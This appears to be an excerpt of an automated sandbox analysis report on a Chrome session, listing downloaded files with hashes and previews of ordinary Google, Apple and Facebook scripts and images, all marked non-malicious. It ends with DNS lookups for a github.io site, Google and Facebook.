                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9316
                                                                                                                                                                                                                                  Entropy (8bit):7.975613114638196
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:rPrx5zvCwQ+82YfPGdlx9Rf15JqIWGdK3Sd2MGy/ly4XA:rPFlvS+ZYXGnR95JfPGy/Xw
                                                                                                                                                                                                                                  MD5:8FC6DE8717489411CDE6604CF116FEA1
                                                                                                                                                                                                                                  SHA1:B3EF77BC017EA29750E2B30B965BAEFEB7A71E0F
                                                                                                                                                                                                                                  SHA-256:B996916C905C959327C530A288D6BA58E3B8AE37BF27CBB77467E97E3139EBC8
                                                                                                                                                                                                                                  SHA-512:05A1F23E2AD89410F45C40B06346ACA17582EADC2EEA1AA113A7C100DBE68EC18315A50650BAAE39A9C6F2EF1F9B28224F3102E3A166022D218D19CC93415303
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/63RAiBrl7WNn4cjdnuJq66QMzv7Br8RFftmeCwSV_z6z_s3Z8HdIoYERwCEf01m3aQ=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF\$..WEBPVP8 P$...~...*..(.>Q".E#.!..V48...7~>=...3_.........9~.......j...;.w.'w.......?.._.k.e.{...........H...`........_.?.{...........P......{W.................?.....p>..d..{..............j.............u5.o........#.o..#.......w....E..w.m?.?...z......=N~#.g..^...j...W.S....|.........._...?...~.}3.K......J.........'..................u.......uW....cX.Eq.O....z.T0....rs.h.)o..!.Z..c....=P..w.g....!-..N.RN.P#.0...4!X....D.J..G.P3...f....L:.@....v\....,.......,..r..G$...M.k".>.v.b......[.5.1B.q..../K.....Xv2..~u.@..........M}?d].....-.....J_.Sot?.[fMxB..nUu.qJ[{[....R1.....K...z..;{|.......q.\.k.s...f.{....d...\....8.;...o9..J|.[...W...Z..i...0.f.G.........O...c,y.....7.._....)..I.".&....+..t.....0.>..FW...,....B8&.c.3zS..{)5.....rmR.&s...F...!......u...de7...*...F.=.`}o'.........M..r....}.......{)....c..'.^Qja..c.....pFnY'5r.*Lg){...L...g.....$._.`...I.....0...I/.... ...Q......@t.M-s...G@YAI..L%fP.&) ..m.g<.!^.A25.Z....B..{.,.f.....j.q.q...,.,l] ..'k.l
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):247552
                                                                                                                                                                                                                                  Entropy (8bit):7.993005525097078
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:Q23BfRdwUhJoFUZswA6fniAcbmO9+1Tnbl6PR7SsFfzSw5dMi:QwRRhJouZVzfiAGmO9C/leRrbpn
                                                                                                                                                                                                                                  MD5:25E522D71A6FE245A90EEA35C1DA7113
                                                                                                                                                                                                                                  SHA1:00E6D5AB198C2175B0BB56CB744D04DD3B52DB8A
                                                                                                                                                                                                                                  SHA-256:51C3825B8ABA3FE06AB52A34DA978D0238CFF9713505FC6B304116A66571C3CA
                                                                                                                                                                                                                                  SHA-512:E42BA17752E3472F7A943D13026FE2F61EAB698644767C9EB8DC9ADF1FD632C306E040A39BB7462AEFFE7AB70E619CE603F8FD66BC5AC6C16DFAFA3809A6F0AB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/lhOWWzCnzrwdIVTnQp4DyhzTpAFaB17XQIFVhfZcOVDfZzJQKUEV9QmDMbxkiRiqM6Q=w526-h296-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.MP.$9.$M$.";...... .............cd'.3$.!....g../..n...xYY.g.Z.e.2+..r-..$.V.cxY+.f...4.Ku..-..NH...S+.DZ.*M.B...^..j....]E..o........x.5..T9..ig..uo;$..._.R.+#f.4...&1....DP..$o..{{..T..._....."H...g.=..,.<G.GQ0....j~..3..q...S. F..H....\.+.=U. .4.ONM4..._H.v(d.z... ..cy...(.4.1.fl.....$#.I...G.'...*I.L..*_k.I.P..V3......s...-...d..6.c.$...T..0{.z....`.'-.D.....$$....\u-.......I...I...|n..G}w.`...8.5/.n..G.xi..u.....T.@..9....d.&.....h=..I..6..L..xt.F3..c...{....._.&t`....18..'-..{."j.......{.....,....s.g...5.M.s&..Y.....j6...{?.$...@............g.^.&=.F..WP.3.AN[.l.....z./..TD....s..<_>U%..y.j..lu.Y.ru<.`.g1...t.....6g.J.u.....9.P.-........$........B<.=y..3....?...0.._..*......ck..].O...;......PiR-.h.....}.y...*..Ix?.[.y>.h....i.sx.{OOG....@.......,..mE7L.v.y~]..D..LS7t].!T..+....j.q.m.60...9..j^..W.j..}.....#..B.!<...m. H..%....Fz..{....^...#+..Q, .......f.e...a.=.@zA......|....x".4*...< Ar......@XP!...
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1618), with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1618
                                                                                                                                                                                                                                  Entropy (8bit):5.781837534694755
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:VKEcJHxKo7LmvtUjPKtXsNEHFmc8s1aiRLrwUnG:fSHgj5c+HFbHv5suG
                                                                                                                                                                                                                                  MD5:94943530E104EE3F88D6AD86638B28C3
                                                                                                                                                                                                                                  SHA1:B8B7F7556523E03B5519338B59AE8D998987D457
                                                                                                                                                                                                                                  SHA-256:2538181A77FD5AEA93113400E39EBA98728EAC1FC13057F0B40C9AAE69054EA1
                                                                                                                                                                                                                                  SHA-512:5031C94E34477D67FAC9002DE62BB81CB359B16B59FAD19EB63CB1221ADFC275AC956F25580BBCA5D5F829FCBAAA4161F59302C584635E8D30217D3492F5D4D1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('6LcA2tEZAAAAAJj7FTYTF9cZ4NL3ShgBCBfkWov0');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:M3U playlist, ASCII text, with very long lines (326)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):7835
                                                                                                                                                                                                                                  Entropy (8bit):5.7037022399580755
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:wfB/5+dzPThTETLTf6LIErhvEpLAQAtuUs59BbLnSXGAxF:wfN5QfdenfAMuH0XkF
                                                                                                                                                                                                                                  MD5:2929F5A19DF395677697F7E2390B7FB1
                                                                                                                                                                                                                                  SHA1:590DDA6F95DDE4F554323144FC0BB9DBF5AA26FA
                                                                                                                                                                                                                                  SHA-256:DBA7DBBDB20E1C8DC044C571D1F9327F2BE09C3B11650EB6F8D7BFD3A431E189
                                                                                                                                                                                                                                  SHA-512:A109107075813C58669C266F9EB601A5C39F497C5EBD46D776D812D56E7920EDFF1B03CCCFA3D6C36F3F9AE8A35CE4C6AA7100F843CE0F9B9EBE66D94185602A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:#EXTM3U.#EXT-X-VERSION:7.#EXT-X-INDEPENDENT-SEGMENTS..#-- en (3) --.#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-HE2-stereo-32",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/1d/b1/35/1db13506-dfce-582e-6daa-09ae6735af46/P875466468_Anull_audio_en_gr32_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-64",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/38/7d/6c/387d6c85-7c78-ffab-d933-df87a038d9f9/P875466468_Anull_audio_en_gr64_mp4a-40-2.m3u8".#EXT-X-MEDIA:TYPE=AUDIO,LANGUAGE="en",GROUP-ID="audio-stereo-128",NAME="English",DEFAULT=YES,AUTOSELECT=YES,CHANNELS="2",URI="https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo211/v4/92/6e/dc/926edca5-b31b-a5ab-a276-61c326313ac5/P875466468_Anull_audio_en_gr128_mp4a-40-2.m3u8"..#EXT-X-I-FRAME-STREAM-INF:AVERAGE-BANDWIDTH=190609,_AVG-BANDWIDT
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.166444981382201
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnuxPRoj9QAuGNG/QVIKZhiGXUOwQRaNw6JpyxZRNlad0:kRZTFuHc9vI/AIGiIAkbRN20
                                                                                                                                                                                                                                  MD5:0E71399CDB7CBD53DE1B7162D3DFB6FA
                                                                                                                                                                                                                                  SHA1:6A69118D5BF45EF956D0FB22C1ACFD0D64D62441
                                                                                                                                                                                                                                  SHA-256:C10B353FA728624E182F457C78A09A76A2DE0F550D10F85B431A31FBE2CFBA98
                                                                                                                                                                                                                                  SHA-512:DD28822F64B039862FB37E1F07BA22BDB8878354D7DC99BB8BB9D2E0370645F54000005D6652CB2AE04745F20EF3E5EA494EBC62B1BDBB0E4EB4FAFBAB0F4BC5
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("kdbckd");._.qr(_.Uza,class extends _.rr{constructor(a){super(a.ta)}H(){return"kdbckd"}N(){return!0}Xa(){return _.awc}});_.$q.kdbckd=_.ZPa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (3175)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45694
                                                                                                                                                                                                                                  Entropy (8bit):5.118242929635633
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:tpi7T07ytsSwuLFB3t8KbX3zrcW3HsBtuv3BtlK7vKH5v9u8kEFsW1:tpK1L5bTIByv9u1EFd
                                                                                                                                                                                                                                  MD5:8B2EA74C2950F702116F9B02ABC52BCB
                                                                                                                                                                                                                                  SHA1:AD7455A6E9F0D7E73BA4B80422EF805FC66F7879
                                                                                                                                                                                                                                  SHA-256:FFEA291B7D7F014FDC619350CAC7B5CECF876DD20EFB498EF0D915FE3AC4BA17
                                                                                                                                                                                                                                  SHA-512:942397EE9B53797364C02D073689CD3FC049E2EA7AF9D89F19608A61EBB76DA8A554D124F8BE99CECE74EB540806C9BBC383DAC238448D07A42DFC4D421B89A3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[990],{67990:function(e,t,n){n.r(t),n.d(t,{ClickstreamProcessor:function(){return we}}).var r=n(24178),i=n(32722),o=n(76588),s=function(){}.s.prototype.setDelegate=function(e){return r.SC.attachDelegate(this,e)},s.prototype.localStorageObject=r.tO.localStorageObject,s.prototype.sessionStorageObject=r.tO.sessionStorageObject.var a=function(){this.environment=new s,this.logger=(0,o.RG)("mt-client-constraints")},c={nonEmpty:function(e,t){return!!r.SC.isObject(t)&&t.hasOwnProperty(e)&&r.SC.isDefinedNonNullNonEmpty(t[e])},valueMatches:function(e,t,n){if(!r.SC.isObject(t))return!1.var i=t[e].return t.hasOwnProperty(e)&&n.indexOf(i)>-1}},p="overrideFieldValue",u=function(){}.u.prototype.constrainedValue=function(e,t,n){var r=e&&e.hasOwnProperty(n)?e[n]:null.return this.applyConstraintRules(r,t)},u.prototype.applyConstraintRules=function(e,t){var n=e.return t&&t.blacklisted?n=null:t&&t.hasOwnProp
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4092)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):13176
                                                                                                                                                                                                                                  Entropy (8bit):5.294987153659635
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:58XZIa+UNj42EGkIa+UNjh2EBYgat0b29PRnNGRX2JZun+npvJIxajAQ5uL6:58pNE7NSrt0b29ZnE1KZu+5mx/Q5uO
                                                                                                                                                                                                                                  MD5:2645EFD84E35194CF6A31C1F7B29F077
                                                                                                                                                                                                                                  SHA1:E6F807F825FEA2575C0EC1BD05B5A305B0C33F0B
                                                                                                                                                                                                                                  SHA-256:2530726858E9A0B705EA05C9AF57F2910A9A84871D716D68332E0CB6D306E15D
                                                                                                                                                                                                                                  SHA-512:D31EF5851FA2EB31FE84A41A9EE4B0D698742A4C3B4DCE033C02B64E8A1673FE9A20C73BC4BC89C58B703AFE8845748957D017AA95ACEB8BF8CFDEDF8E2377EB
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iLl54/yM/l/en_GB/uG4EfEPS4Rt.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("tidyEvent",["Run"],(function(a,b,c,d,e,f,g){var h=[];function i(){while(h.length){var a=h.shift();a.remove?a.remove():a.unsubscribe&&a.unsubscribe()}}function j(a){var b,c=a;function d(){if(!b)return;b.apply(c,arguments);b=null;c=null}if(c&&c.remove)b=c.remove,c.remove=d;else{b=(a=c)==null?void 0:a.unsubscribe;c.unsubscribe=d}return c}function a(a){h.length||d("Run").onLeave(i);if(Array.isArray(a))for(var b=0;b<a.length;b++)a[b]&&h.push(j(a[b]));else a&&h.push(j(a));return a}g["default"]=a}),98);.__d("DeviceBasedLoginForm",["Event","tidyEvent"],(function(a,b,c,d,e,f,g){"use strict";function a(a,b){c("tidyEvent")(c("Event").listen(a,"click",function(a){a.preventDefault(),b.submit()}))}g.init=a}),98);.__d("DeviceBasedLoginUserLoginDialog",["BDClientSignalCollectionTrigger","BDSignalCollectionData","Base64","Button","DOM","Event","FBBrowserPasswordEncryption","LoginServicePasswordEncryptDecryptEventTypedLogger","cx","ge","promiseDone","tidyEvent"],(function(a,b,c,d
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (21389)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):176168
                                                                                                                                                                                                                                  Entropy (8bit):5.469790123757049
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:tlPfuAXw7jHWvEPC6xUoAKLZb3AKj5NLJo9v5MF9Vm:j6WWVAKtb3HHY
                                                                                                                                                                                                                                  MD5:A6F812862FA6C458FE301D0C0E2A1FD8
                                                                                                                                                                                                                                  SHA1:99E5ED7001CF5635FF146751EF7F982BA9FB5BBD
                                                                                                                                                                                                                                  SHA-256:A4949472640ABB50A0BA8069D76C7DCAC8276919D924F59DAF891C65F2BAF306
                                                                                                                                                                                                                                  SHA-512:784BF8DD18377C8CBDF4453D2649B63AAAE3C410D4DF130FEDC66C38954F45681DC2BC19B4EDC0CBB557880EBE6D49C87088E5A5E20A796344D4CD8B10DD7C15
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/5VtnQAqNe99.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ActorURIConfig",[],(function(a,b,c,d,e,f){a=Object.freeze({PARAMETER_ACTOR:"av",ENCRYPTED_PARAMETER_ACTOR:"eav"});f["default"]=a}),66);.__d("BanzaiLogger",["cr:9989"],(function(a,b,c,d,e,f,g){function h(a){return{log:function(c,d){b("cr:9989").post("logger:"+c,d,a)},create:h}}a=h();c=a;g["default"]=c}),98);.__d("CometEnvironmentSite",[],(function(a,b,c,d,e,f){a=Object.freeze({NONE:0,GENERIC_COMET:1,COMET_ON_MOBILE:2,COMET_ON_INSTAGRAM:3,FB_ACCOUNTS_CENTER:5,CANVAS:6,IG_WWW:7,FRL_ACCOUNTS_CENTER:8,NOVI_CHECKOUT:9,ENTERPRISE_CENTER:10,BIZ_WEB:11,BUSINESS_FB:12,HORIZON_WORLDS:14,FB_WEB:15,WHATSAPP:17,META_DOT_COM:18,OCULUS_DOT_COM:19,FRL_FAMILY_CENTER:20,WHATSAPP_FAQ:23,IG_ACCOUNTS_CENTER:24,ADS_MANAGER_ON_BLUE:25,MESSENGER_FAMILY_CENTER:26,META_WORK_PORTFOLIO:27,BARCELONA_WEB:29,FB_FAMILY_CENTER:30,CANDIDATE_PORTAL:31,META_HELP:32,FRL_AUTH:33,META_LLAMA:34,IG_GEN_AI_STUDIO:35,FB_GEN_AI_STUDIO:36,IG_FAMILY_CENTER:37,IG_PRIVACY_CENTER:38,IG_HELP_CENTER:39,ABOUT_META
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5770)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):805295
                                                                                                                                                                                                                                  Entropy (8bit):5.622073916864526
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:5gI/dB/0dAlgEAOJ4JwwcFPh/0aTEwb3iZbeeseJ7aS8+vgAieOKSqzT9E/qWWOl:5gI/dB/0dAlgEAOJ4JwwcFPh/0aTEwbL
                                                                                                                                                                                                                                  MD5:602D32012CA66BE8A01A878441BE6153
                                                                                                                                                                                                                                  SHA1:33BD3931ACD1791EE8A6638674B03D1C9BF08304
                                                                                                                                                                                                                                  SHA-256:69317E53799DFB49D64723E4648A2E863B843D538650C41C210577B66AD727DE
                                                                                                                                                                                                                                  SHA-512:1E7DFFCE6C4202069D38B5D4A59C56B31A2748586AC3A591573BCED7213341B76F26D229E50187C821C87EBE219EE0D625A78B5730F13BF16F28E47A153BF353
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=LEikZe,_b,_tp,byfTOb,lsjVmc/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=ws9Tlc,n73qwf,GkRiKb,e5qFLc,IZT63,UUJqVe,O1Gjze,xUdipf,OTA3Ae,A1yn5d,fKUV3e,aurFic,Ug7Xab,ZwDk9d,V3dDOb,WO9ee,mI3LFb,m9oV,z5Gxfe,ArluEf,q0NEmc,IcVnM,wW2D8b,vrGZEc,fPcQoe,LCkxpb,kr6Nlf,O6y8ed,PrPYRd,MpJwZc,NwH0H,OmgaI,lazG7b,XVMNvd,L1AAkb,KUM7Z,Mlhmy,pYCIec,s39S4,lwddkf,gychg,w9hDv,EEDORb,RMhBfe,SdcwHb,aW3pY,pw70Gc,EFQ78c,Ulmmrd,ZfAoz,mdR7q,xQtZb,JNoxi,kWgXee,MI6k7c,kjKdXe,BVgquf,QIhFr,ovKuLd,hKSk3e,yDVVkb,hc6Ubd,SpsfSb,ebZ3mb,Z5uLle,BBI74,ZDZcre,MdUzUe,A7fCU,zbML3c,zr1jrb,Uas9Hd,pjICDe"
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (24721)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):167425
                                                                                                                                                                                                                                  Entropy (8bit):5.65366769963361
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:9WH9S6sfBXM8dWFcmaKr55Q8YS8KFC246sfBXIGJ5UpkyJXE6pNiK+mK4kwmO9tR:OMLa8dWFck55z4LeqULXHybkBT
                                                                                                                                                                                                                                  MD5:157BD8852DB4A30534786D34C27D9E3F
                                                                                                                                                                                                                                  SHA1:90284E3C138F73944BFAC3AD6D24BD1637F48E62
                                                                                                                                                                                                                                  SHA-256:36CF25DFC02770F6C4725855E51BCE0368926A56ADC85F8DDE142CA368B914F6
                                                                                                                                                                                                                                  SHA-512:969B2931539001E1264EB6B4CD8FB24B3D3200D1D85C52C55E26EE21B15133AAEF61A3CD0808F1F8F47D6665B4B9AF4CE1DDEA3D4B3F438E6E7E2D6673882A33
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("BusinessObjectRelationshipType.facebook",["$InternalEnum"],(function(a,b,c,d,e,f){a=b("$InternalEnum").Mirrored(["AGENCY","NONE","OWNER"]);c=a;f["default"]=c}),66);.__d("BizKitSettingsAdAccountStrings",["fbt","BusinessAccountRenameGating","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i;a=i||d("react");var j=d("BusinessAccountRenameGating").getBARenameEnabled();b=h._("Deactivate ad account");c=h._("Make active");e=h._("Are you sure that you want to deactivate your ad account?");f=h._("{=m0}{=m1}",[h._implicitParam("=m0",a.jsx("p",{children:h._("It will stop all of your current campaigns and prevent you from resuming or creating new ads. Any outstanding balance on your account will be charged to your credit card. The credit cards on your account will be automatically removed after your outstanding balance has been settled. This process may take up to two working days.")})),h._implicitParam("=m1",a.jsx("p",{children:h._("If you'd like to stop your ads but pl
                                                                                                                                                                                                                                  No static file info
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.085226059 CEST192.168.2.61.1.1.10x8f8dStandard query (0)sayidanur.github.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.085364103 CEST192.168.2.61.1.1.10x40ceStandard query (0)sayidanur.github.io65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.834259987 CEST192.168.2.61.1.1.10x1f9Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:01.834408998 CEST192.168.2.61.1.1.10xe3feStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:02.613274097 CEST192.168.2.61.1.1.10x8b59Standard query (0)sayidanur.github.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:02.613862991 CEST192.168.2.61.1.1.10x5196Standard query (0)sayidanur.github.io65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:04.294306993 CEST192.168.2.61.1.1.10xa356Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:04.294306993 CEST192.168.2.61.1.1.10xf010Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.306849957 CEST192.168.2.61.1.1.10xfabStandard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:14.306849957 CEST192.168.2.61.1.1.10x89ecStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.607868910 CEST192.168.2.61.1.1.10x16aaStandard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:15.608526945 CEST192.168.2.61.1.1.10x821aStandard query (0)static.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.153917074 CEST192.168.2.61.1.1.10x540Standard query (0)static.xx.fbcdn.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.154273987 CEST192.168.2.61.1.1.10x2139Standard query (0)static.xx.fbcdn.net65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.356447935 CEST192.168.2.61.1.1.10xeafdStandard query (0)facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:17.356750011 CEST192.168.2.61.1.1.10x4a26Standard query (0)facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:18.530720949 CEST192.168.2.61.1.1.10xd2fStandard query (0)facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:18.531076908 CEST192.168.2.61.1.1.10x366eStandard query (0)facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:23.184489965 CEST192.168.2.61.1.1.10x2faStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                  Sep 29, 2024 06:53:23.184490919 CEST192.168.2.61.1.1.10x8460Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
